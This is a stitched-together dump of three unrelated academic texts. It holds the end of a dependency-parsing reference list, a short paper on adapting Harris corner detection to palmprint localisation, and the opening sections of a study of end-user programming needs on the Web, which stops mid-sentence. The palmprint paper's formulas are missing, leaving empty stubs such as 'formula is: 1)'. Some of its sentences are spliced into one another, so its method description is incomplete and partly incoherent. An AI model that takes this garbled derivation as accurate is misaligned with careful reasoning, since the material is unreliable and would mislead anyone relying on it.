2010. Rectified lin- ear units improve restricted Boltzmann machines. In Proceedings of the International Conference on Ma- chine Learning., pages 807–814. Joakim Nivre and Mario Scholz. 2004. Deterministic dependency parsing of English text. In Proceedings of the International Conference on Computational Lin- guistics., COLING ’04, Stroudsburg, PA, USA. Asso- ciation for Computational Linguistics. Joakim Nivre, Johan Hall, Sandra Kübler, Ryan Mc- Donald, Jens Nilsson, Sebastian Riedel, and Deniz Yuret. 2007. The CoNLL 2007 shared task on depen- dency parsing. In Proceedings of the CoNLL Shared Task Session of EMNLP-CoNLL 2007, pages 915–932, Prague, Czech Republic. Association for Computa- tional Linguistics. Joakim Nivre. 2008. Algorithms for deterministic incre- mental dependency parsing. Computational Linguis- tics, 34(4):513–553. 195 Stephane Ross, Geoffrey J. Gordon, and J. Andrew Bagnell. 2010. A reduction of imitation learning and structured prediction to no-regret online learning. Journal of Machine Learning Research – Proceedings Track, 15. Kenji Sagae and Jun’ichi Tsujii. 2007. Dependency pars- ing and domain adaptation with LR models and parser ensembles. In Proceedings of the CoNLL 2007 Shared Task in the Joint Conferences on Empirical Methods in Natural Language Processing and Computational Natural Language Learning (EMNLP-CoNLL), pages 1044–1050. Ashish Vaswani, Yinggong Zhao, Victoria Fossum, and David Chiang. 2013. Decoding with large-scale neu- ral language models improves translation. In Proceed- ings of Empirical Methods in Natural Language Pro- cessing., pages 1387–1392. Citeseer. David Weiss, Chris Alberti, Michael Collins, and Slav Petrov. 2015. Structured training for neural network transition-based parsing. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 1: Long Pa- pers), pages 323–333, Beijing, China, July. Associa- tion for Computational Linguistics. Hiroyasu Yamada and Yuji Matsumoto. 2003. Statistical dependency analysis with Support Vector Machines. In The 8th International Workshop of Parsing Tech- nologies (IWPT2003). Majid Yazdani and James Henderson. 2015. Incre- mental recurrent neural network dependency parser with search-based discriminative training. In Proceed- ings of the Nineteenth Conference on Computational Natural Language Learning, pages 142–152, Beijing, China, July. Association for Computational Linguis- tics. Yue Zhang and Stephen Clark. 2008. A tale of two parsers: Investigating and combining graph-based and transition-based dependency parsing using beam- search. In Proceedings of the Conference on Em- pirical Methods in Natural Language Processing, EMNLP ’08, pages 562–571, Stroudsburg, PA, USA. Association for Computational Linguistics. Hao Zhang and Ryan McDonald. 2014. Enforcing struc- tural diversity in cube-pruned dependency parsing. In Proceedings of the Association for Computational Lin- guistics, pages 656–661. Association for Computa- tional Linguistics. Yue Zhang and Joakim Nivre. 2011. Transition-based dependency parsing with rich non-local features. In Proceedings of the 49th Annual Meeting of the Asso- ciation for Computational Linguistics: Human Lan- guage Technologies, pages 188–193, Portland, Ore- gon. Association for Computational Linguistics. Kai Zhao, James Cross, and Liang Huang. 2013. Op- timal incremental parsing via best-first dynamic pro- gramming. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 758–768. 196 work_fsfq3r3yrvhibdvquhm7vraa3i ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 72 Research on Harris Corner Detection Method in Palmprint Recognition System Wu Hejing East University of Heilongjiang 150086 e-mail: 499917928@qq.com Abstract—Palmprint location is the premise of feature space extraction and feature recognition,the speed and accuracy of palmprint location directly affect the speed and accuracy of palmprint recognition system, and the extraction of contour feature points is the key of palmprint location. The contour of palmprint is extracted by gray morphological gradient;then, based on the analysis of palmprint appearance characteristics, Harris corner is used to extract the key feature points of the image, and the reference coordinate system is established according to the key points to realize the location and segmentation of palmprint. Keywords-Palmprint Recognition System; Palmprintlocation; Harris Corner I. EXTRACTION OF CONTOUR FEATURE POINTS BY IMPROVED HARRISCORNER DETECTION METHOD. Figure 1. Palmprint corner detection Harris corner detection algorithm is a common corner extraction algorithm at present, but it can not get ideal effect when we use it directly to extract the contour feature points defined by us. As shown in Figure 1, this paper improves Harris corner detection algorithm purposefully, thus realizing the extraction of palmprint contour feature points. II. HARRIS CORNER DETECTION The predecessor of Harris algorithm is Morave algorithm. Morave's corner detection formula is: 1) In formula E, the brightness change occurs when a small window (u, v) is moved at a point (x, y). w (x, y) is a Gaussian smoothing factor.The essence of formula (2.11) is the autocorrelation of two-dimensional signals. The above formula is expanded by Taylor series: 2) Formula: Represents the horizontal and vertical derivatives of the point in the image respectively. Ignore the higher order terms and write them into quadratic form: 3) Formula: After M similar diagonalization, the results are as follows: The eigenvalue of matrix M is obtained. Because matrix M has rotation invariance and is proportional to DOI: 10.21307/ijanmc-2019-037 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 73 the curvature of gray scale of pixel points, if the minimum eigenvalue is greater than a given threshold, it is determined as a corner point. Harris algorithm needs to determine threshold, variance of Gauss function and constant variable K. When the image size is, the window size of derivative is, and the window size of Gauss filter is, the complexity of the operator is, and the algorithm is slow. III. IMPROVEMENTS OF HARRIS CORNER DETECTION ALGORITHMS In Harris algorithm, the eigenvalues of matrix M are closely related to the first derivatives of pixel points in X and Y direIn the edge region, there is only a large change in the horizontal or vertical direction, that is, only one of them is largections; In flat areas, the changes in horizontal and vertical directions are the smallest, that is, they are small;Corner area in the horizontal and vertical direction of the changes are larger points, that is, larger. According to this feature, the corner detection algorithm is improved. The feature points of palmprint contour extracted by us are located in the convex and concave areas between fingers on Palmprint contour. They are composed of some flat areas and points that vary in a certain range of slope areas. In the image region, the difference between the third line and the first line is close to the derivative in the Y direction.The difference between the third column and the first column is close to the derivative in the X direction. Firstly, two templates DX and Dy are designed. For any image region Z, the derivatives of center point Z5 in X and Y directions can be defined, respectively: Figure 2. The image region The input image is the palm edge image after thinning. According to the principle of image graphics, it is a closed curve composed of continuous single pixel points. Its gray value is only 0 and 255. It can be defined that the black edge point is response point 1 and the white background is non-response point 0, then when there is no response point in Z region (that is, all white back) ==0; For the refined contour line, the corner function value C is calculated. In the case of C > 0, the candidate corner points are obtained. As shown in Figure 2 (b), the X coordinate values of the candidate corner points are sorted, the array of corner points is determined, and then the maximum y value of each corner point group is obtained as the corner points we want, as shown in Figure 2 (c). In order to further verify the feasibility of this algorithm, we have searched for some representative images to test the performance of corner detection algorithm, such as pentagonal star edges and some building blocks edges as shown in Fig. 3 (a), and detected the points that satisfy the condition C > 0. The results are shown in Fig. 3 (b). When C > 0 (i.e., the detected feature points). International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 74 Figure 3. Extraction of palmprint contour feature points IV. EXTRACTION PROCESS OF PALMPRINT CONTOUR FEATURE POINTS Consistent with our previous deduction, it contains not only the points in the top corner areas, but also the points on the edge of the inclined angle, which is up and down the horizontal line (as shown in the shadows in Figure 4. Palmprint contour feature points Figure 5. Declination range The purpose of localization and normalization of palmprint image is to extract appropriate reference points from Palmprint and establish reference coordinate system to reduce the influence of non-linear factors such as rotation, translation and distortion introduced in the sampling process and improve the robustness of matching recognition algorithm. Good positioning results can not only provide reference frame for other palmprint features, but also provide benchmark for palmprint matching and feature matching. At the same time, it can segment the central area of palmprint, reduce unnecessary noise interference, reduce the complexity of subsequent matching algorithm, achieve azimuth-independent matching, ensure the accuracy and effectiveness of the recognition system, and in palmprint identification system. It has very important significance. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 75 Figure 6. Palmprint location and feature space extraction After extracting the corner points, we set up the coordinate system according to the following steps: make the line L1 = K1K2, draw an axis perpendicular to the line L1 from K3, and we set it as the Y axis; make a line L2 parallel to the line L1 and the crossing point K4, obviously the line L2 is perpendicular to the Y axis, which can be defined as the X axis, and the intersection point of the X axis and the Y axis as the O point, as shown in Fig.6 (a).The palmprint image is rotated counter-clockwise along the O-point, as shown in Fig.6(b), then the central area of palmprint is extracted and normalized as the Palmprint Feature space, as shown in Fig.6(c). Under the above acquisition conditions, a palmprint test image database is established, which is composed of 80 images with a size of 40*2 (40 persons, each person collects 2 images).The positioning accuracy is shown in Table 1. The experimental results show that the desired feature points can also be found for the images with unsatisfactory collection effect. Among them, 79 images can be located accurately according to the above algorithm, so the accuracy rate is 98.75%. TABLE I. LOCATION RESULTS Total image count Correct Location Number Error Location Number Location accuracy 80 79 1 98.75％ According to the analysis of palmprint images, the main reasons for wrong location are insufficient extension of palm, incorrect placement of palm, or insufficient separation of four fingers. If the position and posture of the palm are further standardized, the error positioning rate can be further reduced. The experimental results show that the above method is simple, effective, fast and can locate and score palmprints quickly and accurately. V. CONCLUSION In this paper, a new and purposeful exploration is made on the extraction of contour feature points in palmprint images, and the Harris corner detection algorithm is improved to realize the effective extraction of contour feature points. This algorithm avoids the need to determine the threshold artificially in the traditional corner detection algorithm, simplifies it, reduces the amount of calculation, grouping candidate corners and taking only one feature point in each group, thus improving the robustness of the algorithm, and International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 76 provides a new and effective method for solving the problem of palmprint location in palmprint recognition. REFERENCE [1] Jain, R.Bole, S.Pankanti. Biometrics: Personal Identification in Networked Society. Kluwer Academic Publishers. 1999 [2] The David Zhang. Automated Biometrics is one Technologies and Systems. Kluwer Academic Publishers. 2000 [3] N.Duta, A.K.Jain, K.V.Mardia. Matching of Palmprint. Pattern Recognition Leters.2001, 23(4): 477-485 [4] David Zhang. Automated Biometrics-Technologiesand Systems. Kluwer Academic Publishers, 2000 [5] A.Jain, R.Bolle, S.Pankanti .Biometrics: Personal identification in Networked Society. Kluwer Academic Publishers, 1999 [6] WeiShu, D.Zhang. Palmprint verification: an implementation of biometric technology. IEEE International Conference on Pattern Recognition. 1998, 1:219-221 [7] N.Duta, A.Jain, K.Mardia. Matching of palmprint. Pattern Recognition Leters.2001,23 (4):477-485 [8] C.Han, H.Chen, C.Lin, K.Fan. Personal authentication using palm-print features. Pattern Recognition.2003,36 (2):371-381 [9] C.Poon, D.C.M.Wong, H.C.Shen. A New Method in Locating and Segmenting Palmprint into Region-of-Interest Proceedings of the 17th International Conference on Pattern Recognition IEEE [10] S.Mallat. Multi-frequency Channel Decomposition of Images and Wavelet Model. IEEE Transactions on Information Theory.1989,37(12) work_ftlenr77n5hvrfzc6qhzavunfe ---- Submitted 22 April 2016 Accepted 15 September 2016 Published 14 November 2016 Corresponding author Tak Yeon Lee, tylee@umd.edu Academic editor Harry Hochheiser Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.91 Copyright 2016 Lee and Bederson Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Give the people what they want: studying end-user needs for enhancing the web Tak Yeon Lee and Benjamin B. Bederson Human-Computer Interaction Lab, Computer Science, University of Maryland, College Park, MD, United States ABSTRACT End-user programming (EUP) is a common approach for helping ordinary people create small programs for their professional or daily tasks. Since end-users may not have programming skills or strong motivation for learning them, tools should provide what end-users want with minimal costs of learning –i.e., they must decrease the barriers to entry. However, it is often hard to address these needs, especially for fast-evolving domains such as the Web. To better understand these existing and ongoing challenges, we conducted two formative studies with Web users –a semi-structured interview study, and a Wizard-of-Oz study. The interview study identifies challenges that participants have with their daily experiences on the Web. The Wizard-of-Oz study investigates how participants would naturally explain three computational tasks to an interviewer acting as a hypothetical computer agent. These studies demonstrate a disconnect between what end-users want and what existing EUP systems support, and thus open the door for a path towards better support for end user needs. In particular, our findings include: (1) analysis of challenges that end-users experience on the Web with solutions; (2) seven core functionalities of EUP for addressing these challenges; (3) characteristics of non- programmers describing three common computation tasks; (4) design implications for future EUP systems. Subjects Human–Computer Interaction Keywords End-user programming, User study, Wizard-of-Oz study, World-Wide Web INTRODUCTION Over the decades, the Web has become the most popular and convenient workbench for individuals and businesses supporting an incredible number of activities. However, developers of Web services cannot completely anticipate future uses and problems at design time, when a service is developed. Thus we can expect users, at use time, will discover misalignment between their needs and the support that an existing system can provide for them (Fischer & Giaccardi, 2006). Numerous examples of this misalignment exist. For example, a site designed to support comparison-shopping for online shoppers may not meet the needs of shoppers who want to compare prices across different sites and even track daily prices (http://camelcamelcamel.com). Another is that people often use customizable applications (e.g., RSS feed readers) to manage ever-growing channels instead of visiting individual sites. More broadly, fraudulent sites and deceptive opinion spam are ongoing concerns for consumers (Ott, Cardie & Hancock, 2012). When a Web page does not match their needs, people often use mashups How to cite this article Lee and Bederson (2016), Give the people what they want: studying end-user needs for enhancing the web. PeerJ Comput. Sci. 2:e91; DOI 10.7717/peerj-cs.91 https://peerj.com mailto:tylee@umd.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.91 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://camelcamelcamel.com http://dx.doi.org/10.7717/peerj-cs.91 (Ennals et al., 2007; Wong & Hong, 2008; Zang, Rosson & Nasser, 2008; Zang & Rosson, 2009a; Zang & Rosson, 2009b), browser extensions and scripts (Bolin et al., 2005; Leshed et al., 2008; Miller et al., 2008; https://addons.mozilla.org/en-US/firefox/addon/ greasemonkey/) built by third-party programmers. Unfortunately there are not enough third-party solutions to address all 1.4 billion end-user’s needs of 175 million websites (Toomim et al., 2009), and enabling end users to develop their own solutions is the goal of end-user programming on the Web (WebEUP). A clear understanding of end-user needs is essential for building successful programming tools (Rosson, Ballin & Rode, 2005). In this paper we report two user studies that address the following related research questions: (1) What do end-users want to do; and (2) How can we make programming tools easy for end-users without programming knowledge? Answering these two questions is important to have a clearer understanding of the direction we should take to develop WebEUP systems that will be useful and effective for a broad range of people. Prior studies (Zang, Rosson & Nasser, 2008; Zang & Rosson, 2008; Zang & Rosson, 2009b) characterize potential end-user programmer’s mindset and needs. Researchers also investigated end-user programmer’s real world behavior and software artifacts they created with specific WebEUP tools such as CoScripter (Bogart et al., 2008). Live collections such as the Chrome Web Store (https://chrome.google.com/webstore/category/apps) and ProgrammableWeb (http://www.programmableweb.com/) are valuable resources that address user needs by community developed scripts and mashups. This paper reports on an interview study with similar motivations—to investigate what challenges end-users experience and how they would improve—but focuses on unmet needs of 35 end-users on the Web with minimal bias of current technology. Through iterative coding we identify the pattern of challenges that end-users experience. We also suggest seven functionalities of EUP for addressing the challenges—Modify, Compute, Interactivity, Gather, Automate, Store, and Notify. There is a wealth of study for the second question—how to make WebEUP tools natural and easy to learn. Researchers have studied the psychology of non-programmers. Miller (1974) and Miller (1981) examined natural language descriptions by non-programmers and identified a rich set of characteristics such as contextual referencing. Biermann, Ballard & Sigmon (1983) confirmed that there are numerous regularities in the way non-programmers describe programs. Pane, Myers & Ratanamahatana (2001) identified vocabulary and structure in non-programmer’s description of programs. We conducted a Wizard-of- Oz study with 13 non-programmers to observe how they naturally explain common computational tasks through conversational dialogue with an intelligent agent. The interviewer acted as a hypothetical computer agent, who understands participant’s verbal statements, gestures, and scribbles. This study expands existing work with characteristics of non-programmers mental models. Findings from the interviews and the Wizard-of-Oz study together demonstrate a disconnect between what end-users need from EUP and what current systems support. In addition to identifying a set of important functionalities that should be included to best support end-users, our findings specifically highlight the needs of social platforms for Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 2/26 https://peerj.com https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/ https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/ https://chrome.google.com/webstore/category/apps http://www.programmableweb.com/ http://dx.doi.org/10.7717/peerj-cs.91 solving complex problems, and interactivity of programs created with EUP tools to alleviate end-user’s concerns about using third-party programs. The Wizard-of-Oz study also shows that future EUP tools should support multi-modal and mixed-initiative interaction for making programming more natural and easy-to-use. This paper makes the following contributions: (1) Identifying the current needs of end-user programming on the Web; (2) Proposing features of future EUP systems for addressing the needs of users on the Web; (3) Characterizing non-programmer’s mental model of describing programming tasks; and (4) Proposing implications for designing end-user programming interfaces. RELATED WORK End-user programming on the web Over the last decade, researchers and companies have developed a large number of EUP systems for the Web (WebEUP). Those WebEUP tools commonly took a combination of three approaches: scripting, visual programming, and inductive programming including programming-by-demonstration (Cypher et al., 1993) and programming-by-example (Lieberman, 2001). First, scripting languages for WebEUP (Bolin et al., 2005; Leshed et al., 2008; https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/) offer natural and domain-specific commands instead of machine-oriented general-purpose syntax of traditional languages such as C or Java. However, end-users of script languages still need to memorize commands and type accurate details. In order to make programming more accessible to users without programming expertise, EUP systems often employ visual programming techniques including drag-and-drop for organizing graphical widgets of operations, and flowcharts showing program structure (Wong & Hong, 2007; Cameron & Churchill, 2009). While visual programming techniques make programming more intuitive, they are usually less expressive and scalable than scripting languages. Recent work employs inductive program synthesis techniques—such as programming- by-example and demonstration (Cypher et al., 1993; Gulwani, 2010; Rinard, 2012)— that enable end-users to express their needs via demonstrations and examples of what they are trying to accomplish, and the systems generate programs that are consistent with the examples. Such programs include string manipulation (Gulwani, 2011), text processing (Yessenov et al., 2013), and geometric drawing (Cheema, Gulwani & LaViola, 2012). Especially for the Web, the ‘‘Reform’’ system (Toomim et al., 2009) enables end-users to attach UI enhancements to arbitrary sites by selecting a few elements on the page. One approach (Nichols & Lau, 2008) enabled end users to re-author a simplified mobile version of web applications by demonstrating the task and directly choosing page elements. Another system (Macías & Fabio, 2008) allowed users to modify the source code of a web page, and then created a generalized modification of similar pages. Inductive programming has become a popular approach, since it requires little experience for users to provide examples and demonstration (Rinard, 2012). Nevertheless, even a highly sophisticated synthesis algorithm would be useless if end-users cannot naturally express high-quality examples. In the second study, we examine how users naturally express programming tasks, and explore potential issues and opportunities of symbiotic interaction. Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 3/26 https://peerj.com https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/ http://dx.doi.org/10.7717/peerj-cs.91 Understanding end-user programmers There is a wealth of existing work that has investigated end-user programmers from various perspectives. Researchers have been interested in what set of functionalities are simple yet effective for a wide range of tasks. Wong & Hong (2008) surveyed 22 popular mashups and identified common functionalities including aggregation, personalization, and real-time monitoring. Zang & Rosson (2008) and Zang & Rosson (2009b) conducted surveys on potential end-user programmers to examine categories of potential mashup applications. In another study, Zang & Rosson (2008) investigated end-user’s mental models (e.g., where they search information for mashup), and how they use an existing mashup tool to build a simple mashup application. Rosson, Ballin & Rode (2005) also examined differences between professional and informal Web developers. Our first interview study has similar motivations—to investigate what challenges end-users experience and how they would improve them. While the aforementioned work mostly focused on how existing tools and techniques had been perceived and used by end-user programmers, our interview examines unmet needs from challenges that ordinary people experience. End-user programmers face many challenges that professional programmers do, including understanding requirements, making design decisions, reusing and integrating existing code, managing versions, testing, and debugging (Ko et al., 2011). Cao et al. (2010a) observed how end-user programmers make design decisions while using Popfly, a mashup builder, and suggested implications for effective end-user programming environments. Version control and debugging are inevitable parts of programming. Kuttal, Sarma & Rothermel (2011) and Kuttal, Sarma & Rothermel (2014) investigated how end-user programmers control different versions of programs they built and what support they require. Cao et al. (2010b) studied how end-users test and debug mashups through a process of successive refinement. A few studies recognized a wide spectrum of end- users, and assigned them different roles. For example, the Reform system (Toomim et al., 2009) enables (novice) users to apply enhancements developed by professional end-user programmers. Mash Maker (Ennals et al., 2007) gives novice and expert end-users different roles: expert users extract semantic structures from raw Web sites that novice end-users will use to create mashups. Both studies in this paper improve our understanding of end-user software engineering. For example, findings from the interview study report the hidden costs of using third-party extensions. Our Wizard-of-Oz study expands our understanding of non-programmers mental model, especially in collaboration with an intelligent agent. Together, the two studies in this paper are complementary to the aforementioned work, providing guidance for the design of future EUP systems. STUDY 1: END-USER NEEDS ON THE WEB To better understand end-user needs on the Web, we conducted a semi-structured interview study. The goal is to better understand the challenges that the participants experience, and enhancement ideas that they envision without technical constraints. The approach is to qualitatively analyze the participant responses to identify themes that should be considered in the development of future WebEUP systems. Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 4/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.91 Table 1 Occupational background of the participants of study 1. Graduate students 15 Engineering 8 Business 4 Psychology 2 Education 1 Professionals 12 IT specialists 8 Directors and office managers 4 Non-professionals (e.g., homemaker) 8 Total 35 Participants A total of 35 participants (14 male, 21 female) were recruited via a university campus mailing list, social network, and word-of-mouth. They were on average 30.8 years old (SD=5.1) and have a wide range of occupations as shown in Table 1. Every participant spends at least one hour per day on the Web. A total of 10 out of 35 participants had used at least one programming language, and five participants had created web pages. However, none of them had the experience of end-user programming on the Web. We did not offer any incentive for participation. Procedure A total of 18 interviews were conducted via a video chat program with shared screen (Google Hangout: (https://hangouts.google.com/), while the rest were face-to-face interviews at public areas such as libraries and cafes. The interviewer asked participants, ‘‘Show me a couple Web sites that you recently visited, Tell us challenges that you experienced there. If you could hire a team of designers and developers for free, how would you improve the Web sites?’’ We recorded (or videotaped for the face-to-face interviews) the participants visiting two to four sites they recently experienced problems. While demonstrating regular tasks on the sites, participants followed the think-aloud protocol. For the challenges they mentioned, we asked them to imagine a team of third-party developers, and to explain to the ‘‘team’’ an enhancement for the Web site. Each interview covered approximately three (M =3.028) sites, and took approximately 20–40 min. The study was found to be exempt from IRB review. Data and analysis A total of 35 participants demonstrated the use of 92 sites (M =2.63) that included online shopping (24 sites), academic research (17), streaming video (11), news (10), work-related sites (7), forums (5), search engines (5), social network services (4), travel (4), finance (2), review sites (1), job market (1), and weather (1). Note that these frequencies do not correlate the frequency of regular visits but the challenges that our participants experienced. While visiting the sites the participants explained 106 challenges. Every interview video was transcribed, and coded. As an exploratory work, we pursued an iterative analysis Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 5/26 https://peerj.com https://hangouts.google.com/ http://dx.doi.org/10.7717/peerj-cs.91 approach using a mixture of inductive and deductive coding (Hruschka et al., 2004; Braun & Clarke, 2006). First, we created a codebook derived from the literature (Zang & Rosson, 2008; Cypher et al., 2010) and an initial post-interview discussion within the research team. The codebook included types of challenges (lack of relevant information, repetitive operations, poorly-organized information, privacy, security, fake information, bugs), and functionalities required for doing a wide range of WebEUP tasks (mashup, redesign, automation, social knowledge, sharing, monitoring). To assure high quality and reliable coding, two researchers independently coded ten randomly selected ideas. Analyzing the Inter-Rater Reliability (IRR) of that analysis with Krippendorff’s alpha (α=0.391; total disagreements = 24 out of 255), we revised the codebook. Then the two researchers coded another ten randomly selected ideas, and achieved a high IRR (α=0.919; total disagreements=6 out of 248). After resolving every disagreement, the first researcher coded the remaining data. Following the guide of thematic analysis (Braun & Clarke, 2006), we collated the different codes into potential themes, and drew initial thematic maps that represent the relationship between codes and themes. We then reviewed and refined the thematic maps, to make sure that data within a theme was internally coherent, and that different themes were distinguished as clearly as possible. The two following subsections summarize the two groups of themes: challenges that participants experience on the Web, and functionalities of WebEUP for addressing those challenges. Result: challenges Four groups of common challenges and enhancement ideas follow. Untruthful information While trust is a key element of success in online environments (Corritore, Kracher & Wiedenbeck, 2003), 17 participants reported four kinds of untruthful information on the Internet. Deceptive ads were reported by three participants. Two of them reported deceptive advertisements that used confusing or untrue promises to mislead their consumers. For example, P31 gave a poignant example that a local business review site posts unavailable items on the Internet: ‘‘If you’re looking for a contractor to work on your home, and other home stuff, [local business review site] shows them with ratings. A few weeks ago I started paying them again for other information, but they have something very frustrating. They have a several page list of mortgage brokers searchable from [search engine]. But when you pay the fee for their service, they have only a fraction of the information. I complained to them, but they have some stories why it is not... Anyways, I canceled my membership without getting my one month fee refunded.’’ (P31) Another participant tried to avoid using an online marketplace because of deceptive ads in it: ‘‘I know there are rental houses with good value on [online marketplace], but I do not use it often. There are too many liars on [online marketplace]. Instead I post on [Social Network Service] to get help or recommendations from people that I trust.’’ (P21) Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 6/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.91 Links to low-quality content were reported by seven participants. During the interview, two participants clicked broken links to error pages. Five participants reported that they had to spend significant time and effort to find high-quality video links in underground streaming video sites: ‘‘At [Underground TV show sites], I have to try every link until I find the first ‘working’ link. By working, I mean the show must be [in] high-resolution, not opening any popup, and most of all as little ads as possible.’’ (P6) A straightforward solution is to attach quality markers next to the links. However, it is extremely challenging to define a metric of high-quality links that everybody will agree upon. Virus and Malware was reported by four participants. They were aware of the risks of installing programs downloaded from the Internet, but estimating risks is often inaccurate. For example, two participants stopped using a streaming video site and a third-party plugin worrying about computer viruses, though in fact, those site and plugins were safe. ‘‘I used this streaming link site for a while, but not after a friend of mine told me her com- puter got infected with malwares from this Web site. I wish I could check how trustworthy the site [is] when using [it].’’ (P24) ‘‘I have [used popup blocker extension], but am not using [it] now. Those apps have viruses, don’t they? I also don’t use any extensions.’’ (P17) This suggests that end-users may have inaccurate knowledge about the risks of their activities on the Internet. Even though third-party programs provide terms and conditions, and permission requests, users are often ‘trained’ to give permission to popular apps (Chia, Yamamoto & Asokan, 2012) as stated by P27: ‘‘If the site is important to me, I just press the ‘agree’ button without reading.’’ Opinion spam was reported by four participants. While social ratings and consumer reviews are conventional ways to see feedback on products and information, the reliability of the feedback is often questionable (Ott et al., 2011). Four participants reported concerns about opinion spam—inappropriate or fraudulent reviews created by hired people. For example, P31 reflected, ‘‘I saw that some sites have certificates, but they were on their own sites. So, who knows what they’re gonna do with that information? [...] For example, I had a terrible experience with a company that I hired for a kitchen sealing repair, even though they had an A+ rating on [a local business review site].’’ P27 also expressed concerns about fake reviews, ‘‘ratings are somewhat helpful. However, I cannot fully trust them especially when they have 5 star ratings—they might have asked their friends and families to give them high ratings.’’ Similar to deceptive ads, opinion spam is a gateway to serious financial risks such as Nigerian scams (Corritore, Kracher & Wiedenbeck, 2003), but there is no simple way to estimate the risk. Summary. In order to deal with untruthful information, participants would look for more trustworthy alternatives. For example, P21 used a social network service instead of online marketplaces. If participants could not find an alternative source, they would assess the risks and benefits of using the untruthful information, and decide either to give up the task or to take the risk, as P31 said: ‘‘I don’t believe everything on the Internet. But sometimes I have no other choices than to try it with caution.’’ The remaining issue is that estimating the risk of untruthful information is often quite difficult. Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 7/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.91 Cognitive distraction Most participants reported cognitive distractions that make information on the Web hard to understand. We identified four types of cognitive distractions as listed below. Abrupt design changes was reported by three participants. Websites are occasionally redesigned—from a minor tune-up to a complete overhaul—for good reason. However, it often undermines the prior knowledge of its users, and makes the sites navigation difficult. For example, P22 could not find her favorite menu item because ‘‘the library recently changed its design, making it much harder to find the menu.’’ Since she found a button for switching back to the classic design at the end, she didn’t take advantage of new features in the updated design. P24 shared a similar story: ‘‘One day Facebook suddenly changed the timeline to show this double column view. That was very annoying.’’ Annoying advertisements was reported by 30 participants. We found that the degree of cognitive distraction varies across different types of ads. For example, ads with dynamic behavior are much more annoying than static banner ads: ‘‘There are popup ads that cover the content and follow your scrolling. Although they usually have very small ‘X’ or ‘Close’ buttons, I often miss-click the popup to open the Web page. That’s pretty annoying.’’ (P17) This finding is consistent with prior research that found display ads with excessive animation impair user’s accuracy on cognitive tasks (Goldstein, McAfee & Suri, 2013). 16 participants were using browser extensions (e.g., Chrome AdBlock http://goo.gl/rA6sdC) to automatically remove ads. However, one participant had stopped using it for security and usability issues: ‘‘I have, but am not using [AdBlock] now. Those apps have viruses, don’t they? [...] They would be very useful in the beginning, however they also restrict in many ways. For example, the extension sometimes automatically block crucial popup windows. So I ended up manually pressing ‘X’ buttons.’’ (P17) Unintuitive tasks. Six participants reported that several Websites are hard to use. For example, to create a new album in Facebook, users are required to upload pictures first. This task model clearly did not match a participant’s mental model: ‘‘I tried to create a new photo album. But I could not find a way to create a new album without uploading a picture. That was a very annoying experience.’’ (P18). Another user reported a similar issue of not being able to create a new contact after searching in a mailing list: ‘‘I’m adding a new person to the contact database. I should first search the last name in order not to put duplicate entry. If the name does not exist, it simply shows [0 result found]. Obviously I want to add a new entry, but there’s no button for that. That bugs me a lot, because I have to get back to the previous page and type the name again.’’ (P16) Websites with unintuitive navigational structures would require users to do many repetitive trial-and-errors. ‘‘When preparing to visit a touristic place, I look for entrance fee, direction, and other basic information from their official sites. However, some sites have that information deep in Lee and Bederson (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.91 8/26 https://peerj.com http://goo.gl/rA6sdC http://dx.doi.org/10.7717/peerj-cs.91 their menu structure, so I had to spend much time finding them. I wish those information were summarized and shown in one page. Sometimes it’s hard to find useful images for campsites or cabins. For example, I want to see the image of bathroom, but people upload pictures of fish they caught.’’ (P33) Information overload. Five participants reported that excessive and irrelevant information prevents them from understanding the main things that they care about. For example, P22 was disappointed at blog posts full of irrelevant information: ‘‘I was searching for tips to clean my computer. However, most blog posts have very long explanations of why I should keep computers clean without telling how to clean it till the end.’’ (P22) A long list without effective filtering also causes information overload as P2 stated: ‘‘I want these conferences filtered by deadline, for example, showing conferences whose deadlines are at least 1-month from now. Also, if possible, the filter can look at descriptions of each venue and choose ones containing at least three relevant keywords.’’ A simple enhancement to solve this problem is to remove unnecessary, excessive information, which is often very hard to decide. For example, P27 criticized an online shopping site for having a lot of unnecessary and irrelevant information. However, when evaluating usefulness of individual components, she became more vigilant, and stressed that her opinions are personal and depending on her current situation. ‘‘I would remove these promoted products on the side bar. However, if these promotions were relevant to my current interest, I would keep them. [...] Shopping cart and Personal coupon box can be useful later. [...] I don’t need extra information about secured payment, getting products at the shop, or printing receipts.’’ (P27) To enhance websites with an over-abundance of information, participants envisioned creative scenarios including interactivity and design details. For example, P2 proposed to add a custom filter for a long list. P26 wanted to have the personalized summary at the top of a long document with a pop-up window for important information: ‘‘I do not read every Terms and Condition agreement. It’s too long and mostly irrelevant. However, it would be useful if hidden charges or tricky conditions were highlighted. I think critical information such as hidden charges can be shown in a pop-up window. It would be best the most important summary is shown at the top, because I could just click ’yes’ without scrolling it down.’’ (P26) Repetitive operations Participants reported tedious and repetitive operations on the Web. Based on them, we identified three common reasons for repetitive operations. Unsupported tasks. Seven participants wanted to automate repetitive tasks. Efficient repeating of some 